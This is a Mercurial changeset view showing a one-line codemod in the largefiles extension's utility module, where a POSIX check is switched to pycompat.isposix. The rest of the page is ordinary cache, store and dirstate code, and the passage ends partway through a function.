##// END OF EJS Templates
codemod: use pycompat.isposix...
Jun Wu -
r34647:238abf65 default
parent child Browse files
Show More
@@ -1,673 +1,673 b''
1 # Copyright 2009-2010 Gregory P. Ward
1 # Copyright 2009-2010 Gregory P. Ward
2 # Copyright 2009-2010 Intelerad Medical Systems Incorporated
2 # Copyright 2009-2010 Intelerad Medical Systems Incorporated
3 # Copyright 2010-2011 Fog Creek Software
3 # Copyright 2010-2011 Fog Creek Software
4 # Copyright 2010-2011 Unity Technologies
4 # Copyright 2010-2011 Unity Technologies
5 #
5 #
6 # This software may be used and distributed according to the terms of the
6 # This software may be used and distributed according to the terms of the
7 # GNU General Public License version 2 or any later version.
7 # GNU General Public License version 2 or any later version.
8
8
9 '''largefiles utility code: must not import other modules in this package.'''
9 '''largefiles utility code: must not import other modules in this package.'''
10 from __future__ import absolute_import
10 from __future__ import absolute_import
11
11
12 import copy
12 import copy
13 import hashlib
13 import hashlib
14 import os
14 import os
15 import stat
15 import stat
16
16
17 from mercurial.i18n import _
17 from mercurial.i18n import _
18
18
19 from mercurial import (
19 from mercurial import (
20 dirstate,
20 dirstate,
21 encoding,
21 encoding,
22 error,
22 error,
23 httpconnection,
23 httpconnection,
24 match as matchmod,
24 match as matchmod,
25 node,
25 node,
26 pycompat,
26 pycompat,
27 scmutil,
27 scmutil,
28 sparse,
28 sparse,
29 util,
29 util,
30 vfs as vfsmod,
30 vfs as vfsmod,
31 )
31 )
32
32
33 shortname = '.hglf'
33 shortname = '.hglf'
34 shortnameslash = shortname + '/'
34 shortnameslash = shortname + '/'
35 longname = 'largefiles'
35 longname = 'largefiles'
36
36
37 # -- Private worker functions ------------------------------------------
37 # -- Private worker functions ------------------------------------------
38
38
39 def getminsize(ui, assumelfiles, opt, default=10):
39 def getminsize(ui, assumelfiles, opt, default=10):
40 lfsize = opt
40 lfsize = opt
41 if not lfsize and assumelfiles:
41 if not lfsize and assumelfiles:
42 lfsize = ui.config(longname, 'minsize', default=default)
42 lfsize = ui.config(longname, 'minsize', default=default)
43 if lfsize:
43 if lfsize:
44 try:
44 try:
45 lfsize = float(lfsize)
45 lfsize = float(lfsize)
46 except ValueError:
46 except ValueError:
47 raise error.Abort(_('largefiles: size must be number (not %s)\n')
47 raise error.Abort(_('largefiles: size must be number (not %s)\n')
48 % lfsize)
48 % lfsize)
49 if lfsize is None:
49 if lfsize is None:
50 raise error.Abort(_('minimum size for largefiles must be specified'))
50 raise error.Abort(_('minimum size for largefiles must be specified'))
51 return lfsize
51 return lfsize
52
52
53 def link(src, dest):
53 def link(src, dest):
54 """Try to create hardlink - if that fails, efficiently make a copy."""
54 """Try to create hardlink - if that fails, efficiently make a copy."""
55 util.makedirs(os.path.dirname(dest))
55 util.makedirs(os.path.dirname(dest))
56 try:
56 try:
57 util.oslink(src, dest)
57 util.oslink(src, dest)
58 except OSError:
58 except OSError:
59 # if hardlinks fail, fallback on atomic copy
59 # if hardlinks fail, fallback on atomic copy
60 with open(src, 'rb') as srcf, util.atomictempfile(dest) as dstf:
60 with open(src, 'rb') as srcf, util.atomictempfile(dest) as dstf:
61 for chunk in util.filechunkiter(srcf):
61 for chunk in util.filechunkiter(srcf):
62 dstf.write(chunk)
62 dstf.write(chunk)
63 os.chmod(dest, os.stat(src).st_mode)
63 os.chmod(dest, os.stat(src).st_mode)
64
64
65 def usercachepath(ui, hash):
65 def usercachepath(ui, hash):
66 '''Return the correct location in the "global" largefiles cache for a file
66 '''Return the correct location in the "global" largefiles cache for a file
67 with the given hash.
67 with the given hash.
68 This cache is used for sharing of largefiles across repositories - both
68 This cache is used for sharing of largefiles across repositories - both
69 to preserve download bandwidth and storage space.'''
69 to preserve download bandwidth and storage space.'''
70 return os.path.join(_usercachedir(ui), hash)
70 return os.path.join(_usercachedir(ui), hash)
71
71
72 def _usercachedir(ui):
72 def _usercachedir(ui):
73 '''Return the location of the "global" largefiles cache.'''
73 '''Return the location of the "global" largefiles cache.'''
74 path = ui.configpath(longname, 'usercache', None)
74 path = ui.configpath(longname, 'usercache', None)
75 if path:
75 if path:
76 return path
76 return path
77 if pycompat.iswindows:
77 if pycompat.iswindows:
78 appdata = encoding.environ.get('LOCALAPPDATA',\
78 appdata = encoding.environ.get('LOCALAPPDATA',\
79 encoding.environ.get('APPDATA'))
79 encoding.environ.get('APPDATA'))
80 if appdata:
80 if appdata:
81 return os.path.join(appdata, longname)
81 return os.path.join(appdata, longname)
82 elif pycompat.sysplatform == 'darwin':
82 elif pycompat.sysplatform == 'darwin':
83 home = encoding.environ.get('HOME')
83 home = encoding.environ.get('HOME')
84 if home:
84 if home:
85 return os.path.join(home, 'Library', 'Caches', longname)
85 return os.path.join(home, 'Library', 'Caches', longname)
86 elif pycompat.osname == 'posix':
86 elif pycompat.isposix:
87 path = encoding.environ.get('XDG_CACHE_HOME')
87 path = encoding.environ.get('XDG_CACHE_HOME')
88 if path:
88 if path:
89 return os.path.join(path, longname)
89 return os.path.join(path, longname)
90 home = encoding.environ.get('HOME')
90 home = encoding.environ.get('HOME')
91 if home:
91 if home:
92 return os.path.join(home, '.cache', longname)
92 return os.path.join(home, '.cache', longname)
93 else:
93 else:
94 raise error.Abort(_('unknown operating system: %s\n')
94 raise error.Abort(_('unknown operating system: %s\n')
95 % pycompat.osname)
95 % pycompat.osname)
96 raise error.Abort(_('unknown %s usercache location') % longname)
96 raise error.Abort(_('unknown %s usercache location') % longname)
97
97
98 def inusercache(ui, hash):
98 def inusercache(ui, hash):
99 path = usercachepath(ui, hash)
99 path = usercachepath(ui, hash)
100 return os.path.exists(path)
100 return os.path.exists(path)
101
101
102 def findfile(repo, hash):
102 def findfile(repo, hash):
103 '''Return store path of the largefile with the specified hash.
103 '''Return store path of the largefile with the specified hash.
104 As a side effect, the file might be linked from user cache.
104 As a side effect, the file might be linked from user cache.
105 Return None if the file can't be found locally.'''
105 Return None if the file can't be found locally.'''
106 path, exists = findstorepath(repo, hash)
106 path, exists = findstorepath(repo, hash)
107 if exists:
107 if exists:
108 repo.ui.note(_('found %s in store\n') % hash)
108 repo.ui.note(_('found %s in store\n') % hash)
109 return path
109 return path
110 elif inusercache(repo.ui, hash):
110 elif inusercache(repo.ui, hash):
111 repo.ui.note(_('found %s in system cache\n') % hash)
111 repo.ui.note(_('found %s in system cache\n') % hash)
112 path = storepath(repo, hash)
112 path = storepath(repo, hash)
113 link(usercachepath(repo.ui, hash), path)
113 link(usercachepath(repo.ui, hash), path)
114 return path
114 return path
115 return None
115 return None
116
116
117 class largefilesdirstate(dirstate.dirstate):
117 class largefilesdirstate(dirstate.dirstate):
118 def __getitem__(self, key):
118 def __getitem__(self, key):
119 return super(largefilesdirstate, self).__getitem__(unixpath(key))
119 return super(largefilesdirstate, self).__getitem__(unixpath(key))
120 def normal(self, f):
120 def normal(self, f):
121 return super(largefilesdirstate, self).normal(unixpath(f))
121 return super(largefilesdirstate, self).normal(unixpath(f))
122 def remove(self, f):
122 def remove(self, f):
123 return super(largefilesdirstate, self).remove(unixpath(f))
123 return super(largefilesdirstate, self).remove(unixpath(f))
124 def add(self, f):
124 def add(self, f):
125 return super(largefilesdirstate, self).add(unixpath(f))
125 return super(largefilesdirstate, self).add(unixpath(f))
126 def drop(self, f):
126 def drop(self, f):
127 return super(largefilesdirstate, self).drop(unixpath(f))
127 return super(largefilesdirstate, self).drop(unixpath(f))
128 def forget(self, f):
128 def forget(self, f):
129 return super(largefilesdirstate, self).forget(unixpath(f))
129 return super(largefilesdirstate, self).forget(unixpath(f))
130 def normallookup(self, f):
130 def normallookup(self, f):
131 return super(largefilesdirstate, self).normallookup(unixpath(f))
131 return super(largefilesdirstate, self).normallookup(unixpath(f))
132 def _ignore(self, f):
132 def _ignore(self, f):
133 return False
133 return False
134 def write(self, tr=False):
134 def write(self, tr=False):
135 # (1) disable PENDING mode always
135 # (1) disable PENDING mode always
136 # (lfdirstate isn't yet managed as a part of the transaction)
136 # (lfdirstate isn't yet managed as a part of the transaction)
137 # (2) avoid develwarn 'use dirstate.write with ....'
137 # (2) avoid develwarn 'use dirstate.write with ....'
138 super(largefilesdirstate, self).write(None)
138 super(largefilesdirstate, self).write(None)
139
139
140 def openlfdirstate(ui, repo, create=True):
140 def openlfdirstate(ui, repo, create=True):
141 '''
141 '''
142 Return a dirstate object that tracks largefiles: i.e. its root is
142 Return a dirstate object that tracks largefiles: i.e. its root is
143 the repo root, but it is saved in .hg/largefiles/dirstate.
143 the repo root, but it is saved in .hg/largefiles/dirstate.
144 '''
144 '''
145 vfs = repo.vfs
145 vfs = repo.vfs
146 lfstoredir = longname
146 lfstoredir = longname
147 opener = vfsmod.vfs(vfs.join(lfstoredir))
147 opener = vfsmod.vfs(vfs.join(lfstoredir))
148 lfdirstate = largefilesdirstate(opener, ui, repo.root,
148 lfdirstate = largefilesdirstate(opener, ui, repo.root,
149 repo.dirstate._validate,
149 repo.dirstate._validate,
150 lambda: sparse.matcher(repo))
150 lambda: sparse.matcher(repo))
151
151
152 # If the largefiles dirstate does not exist, populate and create
152 # If the largefiles dirstate does not exist, populate and create
153 # it. This ensures that we create it on the first meaningful
153 # it. This ensures that we create it on the first meaningful
154 # largefiles operation in a new clone.
154 # largefiles operation in a new clone.
155 if create and not vfs.exists(vfs.join(lfstoredir, 'dirstate')):
155 if create and not vfs.exists(vfs.join(lfstoredir, 'dirstate')):
156 matcher = getstandinmatcher(repo)
156 matcher = getstandinmatcher(repo)
157 standins = repo.dirstate.walk(matcher, subrepos=[], unknown=False,
157 standins = repo.dirstate.walk(matcher, subrepos=[], unknown=False,
158 ignored=False)
158 ignored=False)
159
159
160 if len(standins) > 0:
160 if len(standins) > 0:
161 vfs.makedirs(lfstoredir)
161 vfs.makedirs(lfstoredir)
162
162
163 for standin in standins:
163 for standin in standins:
164 lfile = splitstandin(standin)
164 lfile = splitstandin(standin)
165 lfdirstate.normallookup(lfile)
165 lfdirstate.normallookup(lfile)
166 return lfdirstate
166 return lfdirstate
167
167
168 def lfdirstatestatus(lfdirstate, repo):
168 def lfdirstatestatus(lfdirstate, repo):
169 pctx = repo['.']
169 pctx = repo['.']
170 match = matchmod.always(repo.root, repo.getcwd())
170 match = matchmod.always(repo.root, repo.getcwd())
171 unsure, s = lfdirstate.status(match, subrepos=[], ignored=False,
171 unsure, s = lfdirstate.status(match, subrepos=[], ignored=False,
172 clean=False, unknown=False)
172 clean=False, unknown=False)
173 modified, clean = s.modified, s.clean
173 modified, clean = s.modified, s.clean
174 for lfile in unsure:
174 for lfile in unsure:
175 try:
175 try:
176 fctx = pctx[standin(lfile)]
176 fctx = pctx[standin(lfile)]
177 except LookupError:
177 except LookupError:
178 fctx = None
178 fctx = None
179 if not fctx or readasstandin(fctx) != hashfile(repo.wjoin(lfile)):
179 if not fctx or readasstandin(fctx) != hashfile(repo.wjoin(lfile)):
180 modified.append(lfile)
180 modified.append(lfile)
181 else:
181 else:
182 clean.append(lfile)
182 clean.append(lfile)
183 lfdirstate.normal(lfile)
183 lfdirstate.normal(lfile)
184 return s
184 return s
185
185
186 def listlfiles(repo, rev=None, matcher=None):
186 def listlfiles(repo, rev=None, matcher=None):
187 '''return a list of largefiles in the working copy or the
187 '''return a list of largefiles in the working copy or the
188 specified changeset'''
188 specified changeset'''
189
189
190 if matcher is None:
190 if matcher is None:
191 matcher = getstandinmatcher(repo)
191 matcher = getstandinmatcher(repo)
192
192
193 # ignore unknown files in working directory
193 # ignore unknown files in working directory
194 return [splitstandin(f)
194 return [splitstandin(f)
195 for f in repo[rev].walk(matcher)
195 for f in repo[rev].walk(matcher)
196 if rev is not None or repo.dirstate[f] != '?']
196 if rev is not None or repo.dirstate[f] != '?']
197
197
198 def instore(repo, hash, forcelocal=False):
198 def instore(repo, hash, forcelocal=False):
199 '''Return true if a largefile with the given hash exists in the store'''
199 '''Return true if a largefile with the given hash exists in the store'''
200 return os.path.exists(storepath(repo, hash, forcelocal))
200 return os.path.exists(storepath(repo, hash, forcelocal))
201
201
202 def storepath(repo, hash, forcelocal=False):
202 def storepath(repo, hash, forcelocal=False):
203 '''Return the correct location in the repository largefiles store for a
203 '''Return the correct location in the repository largefiles store for a
204 file with the given hash.'''
204 file with the given hash.'''
205 if not forcelocal and repo.shared():
205 if not forcelocal and repo.shared():
206 return repo.vfs.reljoin(repo.sharedpath, longname, hash)
206 return repo.vfs.reljoin(repo.sharedpath, longname, hash)
207 return repo.vfs.join(longname, hash)
207 return repo.vfs.join(longname, hash)
208
208
209 def findstorepath(repo, hash):
209 def findstorepath(repo, hash):
210 '''Search through the local store path(s) to find the file for the given
210 '''Search through the local store path(s) to find the file for the given
211 hash. If the file is not found, its path in the primary store is returned.
211 hash. If the file is not found, its path in the primary store is returned.
212 The return value is a tuple of (path, exists(path)).
212 The return value is a tuple of (path, exists(path)).
213 '''
213 '''
214 # For shared repos, the primary store is in the share source. But for
214 # For shared repos, the primary store is in the share source. But for
215 # backward compatibility, force a lookup in the local store if it wasn't
215 # backward compatibility, force a lookup in the local store if it wasn't
216 # found in the share source.
216 # found in the share source.
217 path = storepath(repo, hash, False)
217 path = storepath(repo, hash, False)
218
218
219 if instore(repo, hash):
219 if instore(repo, hash):
220 return (path, True)
220 return (path, True)
221 elif repo.shared() and instore(repo, hash, True):
221 elif repo.shared() and instore(repo, hash, True):
222 return storepath(repo, hash, True), True
222 return storepath(repo, hash, True), True
223
223
224 return (path, False)
224 return (path, False)
225
225
226 def copyfromcache(repo, hash, filename):
226 def copyfromcache(repo, hash, filename):
227 '''Copy the specified largefile from the repo or system cache to
227 '''Copy the specified largefile from the repo or system cache to
228 filename in the repository. Return true on success or false if the
228 filename in the repository. Return true on success or false if the
229 file was not found in either cache (which should not happened:
229 file was not found in either cache (which should not happened:
230 this is meant to be called only after ensuring that the needed
230 this is meant to be called only after ensuring that the needed
231 largefile exists in the cache).'''
231 largefile exists in the cache).'''
232 wvfs = repo.wvfs
232 wvfs = repo.wvfs
233 path = findfile(repo, hash)
233 path = findfile(repo, hash)
234 if path is None:
234 if path is None:
235 return False
235 return False
236 wvfs.makedirs(wvfs.dirname(wvfs.join(filename)))
236 wvfs.makedirs(wvfs.dirname(wvfs.join(filename)))
237 # The write may fail before the file is fully written, but we
237 # The write may fail before the file is fully written, but we
238 # don't use atomic writes in the working copy.
238 # don't use atomic writes in the working copy.
239 with open(path, 'rb') as srcfd, wvfs(filename, 'wb') as destfd:
239 with open(path, 'rb') as srcfd, wvfs(filename, 'wb') as destfd:
240 gothash = copyandhash(
240 gothash = copyandhash(
241 util.filechunkiter(srcfd), destfd)
241 util.filechunkiter(srcfd), destfd)
242 if gothash != hash:
242 if gothash != hash:
243 repo.ui.warn(_('%s: data corruption in %s with hash %s\n')
243 repo.ui.warn(_('%s: data corruption in %s with hash %s\n')
244 % (filename, path, gothash))
244 % (filename, path, gothash))
245 wvfs.unlink(filename)
245 wvfs.unlink(filename)
246 return False
246 return False
247 return True
247 return True
248
248
249 def copytostore(repo, ctx, file, fstandin):
249 def copytostore(repo, ctx, file, fstandin):
250 wvfs = repo.wvfs
250 wvfs = repo.wvfs
251 hash = readasstandin(ctx[fstandin])
251 hash = readasstandin(ctx[fstandin])
252 if instore(repo, hash):
252 if instore(repo, hash):
253 return
253 return
254 if wvfs.exists(file):
254 if wvfs.exists(file):
255 copytostoreabsolute(repo, wvfs.join(file), hash)
255 copytostoreabsolute(repo, wvfs.join(file), hash)
256 else:
256 else:
257 repo.ui.warn(_("%s: largefile %s not available from local store\n") %
257 repo.ui.warn(_("%s: largefile %s not available from local store\n") %
258 (file, hash))
258 (file, hash))
259
259
260 def copyalltostore(repo, node):
260 def copyalltostore(repo, node):
261 '''Copy all largefiles in a given revision to the store'''
261 '''Copy all largefiles in a given revision to the store'''
262
262
263 ctx = repo[node]
263 ctx = repo[node]
264 for filename in ctx.files():
264 for filename in ctx.files():
265 realfile = splitstandin(filename)
265 realfile = splitstandin(filename)
266 if realfile is not None and filename in ctx.manifest():
266 if realfile is not None and filename in ctx.manifest():
267 copytostore(repo, ctx, realfile, filename)
267 copytostore(repo, ctx, realfile, filename)
268
268
269 def copytostoreabsolute(repo, file, hash):
269 def copytostoreabsolute(repo, file, hash):
270 if inusercache(repo.ui, hash):
270 if inusercache(repo.ui, hash):
271 link(usercachepath(repo.ui, hash), storepath(repo, hash))
271 link(usercachepath(repo.ui, hash), storepath(repo, hash))
272 else:
272 else:
273 util.makedirs(os.path.dirname(storepath(repo, hash)))
273 util.makedirs(os.path.dirname(storepath(repo, hash)))
274 with open(file, 'rb') as srcf:
274 with open(file, 'rb') as srcf:
275 with util.atomictempfile(storepath(repo, hash),
275 with util.atomictempfile(storepath(repo, hash),
276 createmode=repo.store.createmode) as dstf:
276 createmode=repo.store.createmode) as dstf:
277 for chunk in util.filechunkiter(srcf):
277 for chunk in util.filechunkiter(srcf):
278 dstf.write(chunk)
278 dstf.write(chunk)
279 linktousercache(repo, hash)
279 linktousercache(repo, hash)
280
280
281 def linktousercache(repo, hash):
281 def linktousercache(repo, hash):
282 '''Link / copy the largefile with the specified hash from the store
282 '''Link / copy the largefile with the specified hash from the store
283 to the cache.'''
283 to the cache.'''
284 path = usercachepath(repo.ui, hash)
284 path = usercachepath(repo.ui, hash)
285 link(storepath(repo, hash), path)
285 link(storepath(repo, hash), path)
286
286
287 def getstandinmatcher(repo, rmatcher=None):
287 def getstandinmatcher(repo, rmatcher=None):
288 '''Return a match object that applies rmatcher to the standin directory'''
288 '''Return a match object that applies rmatcher to the standin directory'''
289 wvfs = repo.wvfs
289 wvfs = repo.wvfs
290 standindir = shortname
290 standindir = shortname
291
291
292 # no warnings about missing files or directories
292 # no warnings about missing files or directories
293 badfn = lambda f, msg: None
293 badfn = lambda f, msg: None
294
294
295 if rmatcher and not rmatcher.always():
295 if rmatcher and not rmatcher.always():
296 pats = [wvfs.join(standindir, pat) for pat in rmatcher.files()]
296 pats = [wvfs.join(standindir, pat) for pat in rmatcher.files()]
297 if not pats:
297 if not pats:
298 pats = [wvfs.join(standindir)]
298 pats = [wvfs.join(standindir)]
299 match = scmutil.match(repo[None], pats, badfn=badfn)
299 match = scmutil.match(repo[None], pats, badfn=badfn)
300 else:
300 else:
301 # no patterns: relative to repo root
301 # no patterns: relative to repo root
302 match = scmutil.match(repo[None], [wvfs.join(standindir)], badfn=badfn)
302 match = scmutil.match(repo[None], [wvfs.join(standindir)], badfn=badfn)
303 return match
303 return match
304
304
305 def composestandinmatcher(repo, rmatcher):
305 def composestandinmatcher(repo, rmatcher):
306 '''Return a matcher that accepts standins corresponding to the
306 '''Return a matcher that accepts standins corresponding to the
307 files accepted by rmatcher. Pass the list of files in the matcher
307 files accepted by rmatcher. Pass the list of files in the matcher
308 as the paths specified by the user.'''
308 as the paths specified by the user.'''
309 smatcher = getstandinmatcher(repo, rmatcher)
309 smatcher = getstandinmatcher(repo, rmatcher)
310 isstandin = smatcher.matchfn
310 isstandin = smatcher.matchfn
311 def composedmatchfn(f):
311 def composedmatchfn(f):
312 return isstandin(f) and rmatcher.matchfn(splitstandin(f))
312 return isstandin(f) and rmatcher.matchfn(splitstandin(f))
313 smatcher.matchfn = composedmatchfn
313 smatcher.matchfn = composedmatchfn
314
314
315 return smatcher
315 return smatcher
316
316
317 def standin(filename):
317 def standin(filename):
318 '''Return the repo-relative path to the standin for the specified big
318 '''Return the repo-relative path to the standin for the specified big
319 file.'''
319 file.'''
320 # Notes:
320 # Notes:
321 # 1) Some callers want an absolute path, but for instance addlargefiles
321 # 1) Some callers want an absolute path, but for instance addlargefiles
322 # needs it repo-relative so it can be passed to repo[None].add(). So
322 # needs it repo-relative so it can be passed to repo[None].add(). So
323 # leave it up to the caller to use repo.wjoin() to get an absolute path.
323 # leave it up to the caller to use repo.wjoin() to get an absolute path.
324 # 2) Join with '/' because that's what dirstate always uses, even on
324 # 2) Join with '/' because that's what dirstate always uses, even on
325 # Windows. Change existing separator to '/' first in case we are
325 # Windows. Change existing separator to '/' first in case we are
326 # passed filenames from an external source (like the command line).
326 # passed filenames from an external source (like the command line).
327 return shortnameslash + util.pconvert(filename)
327 return shortnameslash + util.pconvert(filename)
328
328
329 def isstandin(filename):
329 def isstandin(filename):
330 '''Return true if filename is a big file standin. filename must be
330 '''Return true if filename is a big file standin. filename must be
331 in Mercurial's internal form (slash-separated).'''
331 in Mercurial's internal form (slash-separated).'''
332 return filename.startswith(shortnameslash)
332 return filename.startswith(shortnameslash)
333
333
334 def splitstandin(filename):
334 def splitstandin(filename):
335 # Split on / because that's what dirstate always uses, even on Windows.
335 # Split on / because that's what dirstate always uses, even on Windows.
336 # Change local separator to / first just in case we are passed filenames
336 # Change local separator to / first just in case we are passed filenames
337 # from an external source (like the command line).
337 # from an external source (like the command line).
338 bits = util.pconvert(filename).split('/', 1)
338 bits = util.pconvert(filename).split('/', 1)
339 if len(bits) == 2 and bits[0] == shortname:
339 if len(bits) == 2 and bits[0] == shortname:
340 return bits[1]
340 return bits[1]
341 else:
341 else:
342 return None
342 return None
343
343
344 def updatestandin(repo, lfile, standin):
344 def updatestandin(repo, lfile, standin):
345 """Re-calculate hash value of lfile and write it into standin
345 """Re-calculate hash value of lfile and write it into standin
346
346
347 This assumes that "lfutil.standin(lfile) == standin", for efficiency.
347 This assumes that "lfutil.standin(lfile) == standin", for efficiency.
348 """
348 """
349 file = repo.wjoin(lfile)
349 file = repo.wjoin(lfile)
350 if repo.wvfs.exists(lfile):
350 if repo.wvfs.exists(lfile):
351 hash = hashfile(file)
351 hash = hashfile(file)
352 executable = getexecutable(file)
352 executable = getexecutable(file)
353 writestandin(repo, standin, hash, executable)
353 writestandin(repo, standin, hash, executable)
354 else:
354 else:
355 raise error.Abort(_('%s: file not found!') % lfile)
355 raise error.Abort(_('%s: file not found!') % lfile)
356
356
357 def readasstandin(fctx):
357 def readasstandin(fctx):
358 '''read hex hash from given filectx of standin file
358 '''read hex hash from given filectx of standin file
359
359
360 This encapsulates how "standin" data is stored into storage layer.'''
360 This encapsulates how "standin" data is stored into storage layer.'''
361 return fctx.data().strip()
361 return fctx.data().strip()
362
362
363 def writestandin(repo, standin, hash, executable):
363 def writestandin(repo, standin, hash, executable):
364 '''write hash to <repo.root>/<standin>'''
364 '''write hash to <repo.root>/<standin>'''
365 repo.wwrite(standin, hash + '\n', executable and 'x' or '')
365 repo.wwrite(standin, hash + '\n', executable and 'x' or '')
366
366
367 def copyandhash(instream, outfile):
367 def copyandhash(instream, outfile):
368 '''Read bytes from instream (iterable) and write them to outfile,
368 '''Read bytes from instream (iterable) and write them to outfile,
369 computing the SHA-1 hash of the data along the way. Return the hash.'''
369 computing the SHA-1 hash of the data along the way. Return the hash.'''
370 hasher = hashlib.sha1('')
370 hasher = hashlib.sha1('')
371 for data in instream:
371 for data in instream:
372 hasher.update(data)
372 hasher.update(data)
373 outfile.write(data)
373 outfile.write(data)
374 return hasher.hexdigest()
374 return hasher.hexdigest()
375
375
376 def hashfile(file):
376 def hashfile(file):
377 if not os.path.exists(file):
377 if not os.path.exists(file):
378 return ''
378 return ''
379 with open(file, 'rb') as fd:
379 with open(file, 'rb') as fd:
380 return hexsha1(fd)
380 return hexsha1(fd)
381
381
382 def getexecutable(filename):
382 def getexecutable(filename):
383 mode = os.stat(filename).st_mode
383 mode = os.stat(filename).st_mode
384 return ((mode & stat.S_IXUSR) and
384 return ((mode & stat.S_IXUSR) and
385 (mode & stat.S_IXGRP) and
385 (mode & stat.S_IXGRP) and
386 (mode & stat.S_IXOTH))
386 (mode & stat.S_IXOTH))
387
387
388 def urljoin(first, second, *arg):
388 def urljoin(first, second, *arg):
389 def join(left, right):
389 def join(left, right):
390 if not left.endswith('/'):
390 if not left.endswith('/'):
391 left += '/'
391 left += '/'
392 if right.startswith('/'):
392 if right.startswith('/'):
393 right = right[1:]
393 right = right[1:]
394 return left + right
394 return left + right
395
395
396 url = join(first, second)
396 url = join(first, second)
397 for a in arg:
397 for a in arg:
398 url = join(url, a)
398 url = join(url, a)
399 return url
399 return url
400
400
401 def hexsha1(fileobj):
401 def hexsha1(fileobj):
402 """hexsha1 returns the hex-encoded sha1 sum of the data in the file-like
402 """hexsha1 returns the hex-encoded sha1 sum of the data in the file-like
403 object data"""
403 object data"""
404 h = hashlib.sha1()
404 h = hashlib.sha1()
405 for chunk in util.filechunkiter(fileobj):
405 for chunk in util.filechunkiter(fileobj):
406 h.update(chunk)
406 h.update(chunk)
407 return h.hexdigest()
407 return h.hexdigest()
408
408
409 def httpsendfile(ui, filename):
409 def httpsendfile(ui, filename):
410 return httpconnection.httpsendfile(ui, filename, 'rb')
410 return httpconnection.httpsendfile(ui, filename, 'rb')
411
411
412 def unixpath(path):
412 def unixpath(path):
413 '''Return a version of path normalized for use with the lfdirstate.'''
413 '''Return a version of path normalized for use with the lfdirstate.'''
414 return util.pconvert(os.path.normpath(path))
414 return util.pconvert(os.path.normpath(path))
415
415
416 def islfilesrepo(repo):
416 def islfilesrepo(repo):
417 '''Return true if the repo is a largefile repo.'''
417 '''Return true if the repo is a largefile repo.'''
418 if ('largefiles' in repo.requirements and
418 if ('largefiles' in repo.requirements and
419 any(shortnameslash in f[0] for f in repo.store.datafiles())):
419 any(shortnameslash in f[0] for f in repo.store.datafiles())):
420 return True
420 return True
421
421
422 return any(openlfdirstate(repo.ui, repo, False))
422 return any(openlfdirstate(repo.ui, repo, False))
423
423
424 class storeprotonotcapable(Exception):
424 class storeprotonotcapable(Exception):
425 def __init__(self, storetypes):
425 def __init__(self, storetypes):
426 self.storetypes = storetypes
426 self.storetypes = storetypes
427
427
428 def getstandinsstate(repo):
428 def getstandinsstate(repo):
429 standins = []
429 standins = []
430 matcher = getstandinmatcher(repo)
430 matcher = getstandinmatcher(repo)
431 wctx = repo[None]
431 wctx = repo[None]
432 for standin in repo.dirstate.walk(matcher, subrepos=[], unknown=False,
432 for standin in repo.dirstate.walk(matcher, subrepos=[], unknown=False,
433 ignored=False):
433 ignored=False):
434 lfile = splitstandin(standin)
434 lfile = splitstandin(standin)
435 try:
435 try:
436 hash = readasstandin(wctx[standin])
436 hash = readasstandin(wctx[standin])
437 except IOError:
437 except IOError:
438 hash = None
438 hash = None
439 standins.append((lfile, hash))
439 standins.append((lfile, hash))
440 return standins
440 return standins
441
441
442 def synclfdirstate(repo, lfdirstate, lfile, normallookup):
442 def synclfdirstate(repo, lfdirstate, lfile, normallookup):
443 lfstandin = standin(lfile)
443 lfstandin = standin(lfile)
444 if lfstandin in repo.dirstate:
444 if lfstandin in repo.dirstate:
445 stat = repo.dirstate._map[lfstandin]
445 stat = repo.dirstate._map[lfstandin]
446 state, mtime = stat[0], stat[3]
446 state, mtime = stat[0], stat[3]
447 else:
447 else:
448 state, mtime = '?', -1
448 state, mtime = '?', -1
449 if state == 'n':
449 if state == 'n':
450 if (normallookup or mtime < 0 or
450 if (normallookup or mtime < 0 or
451 not repo.wvfs.exists(lfile)):
451 not repo.wvfs.exists(lfile)):
452 # state 'n' doesn't ensure 'clean' in this case
452 # state 'n' doesn't ensure 'clean' in this case
453 lfdirstate.normallookup(lfile)
453 lfdirstate.normallookup(lfile)
454 else:
454 else:
455 lfdirstate.normal(lfile)
455 lfdirstate.normal(lfile)
456 elif state == 'm':
456 elif state == 'm':
457 lfdirstate.normallookup(lfile)
457 lfdirstate.normallookup(lfile)
458 elif state == 'r':
458 elif state == 'r':
459 lfdirstate.remove(lfile)
459 lfdirstate.remove(lfile)
460 elif state == 'a':
460 elif state == 'a':
461 lfdirstate.add(lfile)
461 lfdirstate.add(lfile)
462 elif state == '?':
462 elif state == '?':
463 lfdirstate.drop(lfile)
463 lfdirstate.drop(lfile)
464
464
465 def markcommitted(orig, ctx, node):
465 def markcommitted(orig, ctx, node):
466 repo = ctx.repo()
466 repo = ctx.repo()
467
467
468 orig(node)
468 orig(node)
469
469
470 # ATTENTION: "ctx.files()" may differ from "repo[node].files()"
470 # ATTENTION: "ctx.files()" may differ from "repo[node].files()"
471 # because files coming from the 2nd parent are omitted in the latter.
471 # because files coming from the 2nd parent are omitted in the latter.
472 #
472 #
473 # The former should be used to get targets of "synclfdirstate",
473 # The former should be used to get targets of "synclfdirstate",
474 # because such files:
474 # because such files:
475 # - are marked as "a" by "patch.patch()" (e.g. via transplant), and
475 # - are marked as "a" by "patch.patch()" (e.g. via transplant), and
476 # - have to be marked as "n" after commit, but
476 # - have to be marked as "n" after commit, but
477 # - aren't listed in "repo[node].files()"
477 # - aren't listed in "repo[node].files()"
478
478
479 lfdirstate = openlfdirstate(repo.ui, repo)
479 lfdirstate = openlfdirstate(repo.ui, repo)
480 for f in ctx.files():
480 for f in ctx.files():
481 lfile = splitstandin(f)
481 lfile = splitstandin(f)
482 if lfile is not None:
482 if lfile is not None:
483 synclfdirstate(repo, lfdirstate, lfile, False)
483 synclfdirstate(repo, lfdirstate, lfile, False)
484 lfdirstate.write()
484 lfdirstate.write()
485
485
486 # As part of committing, copy all of the largefiles into the cache.
486 # As part of committing, copy all of the largefiles into the cache.
487 #
487 #
488 # Using "node" instead of "ctx" implies additional "repo[node]"
488 # Using "node" instead of "ctx" implies additional "repo[node]"
489 # lookup while copyalltostore(), but can omit redundant check for
489 # lookup while copyalltostore(), but can omit redundant check for
490 # files comming from the 2nd parent, which should exist in store
490 # files comming from the 2nd parent, which should exist in store
491 # at merging.
491 # at merging.
492 copyalltostore(repo, node)
492 copyalltostore(repo, node)
493
493
494 def getlfilestoupdate(oldstandins, newstandins):
494 def getlfilestoupdate(oldstandins, newstandins):
495 changedstandins = set(oldstandins).symmetric_difference(set(newstandins))
495 changedstandins = set(oldstandins).symmetric_difference(set(newstandins))
496 filelist = []
496 filelist = []
497 for f in changedstandins:
497 for f in changedstandins:
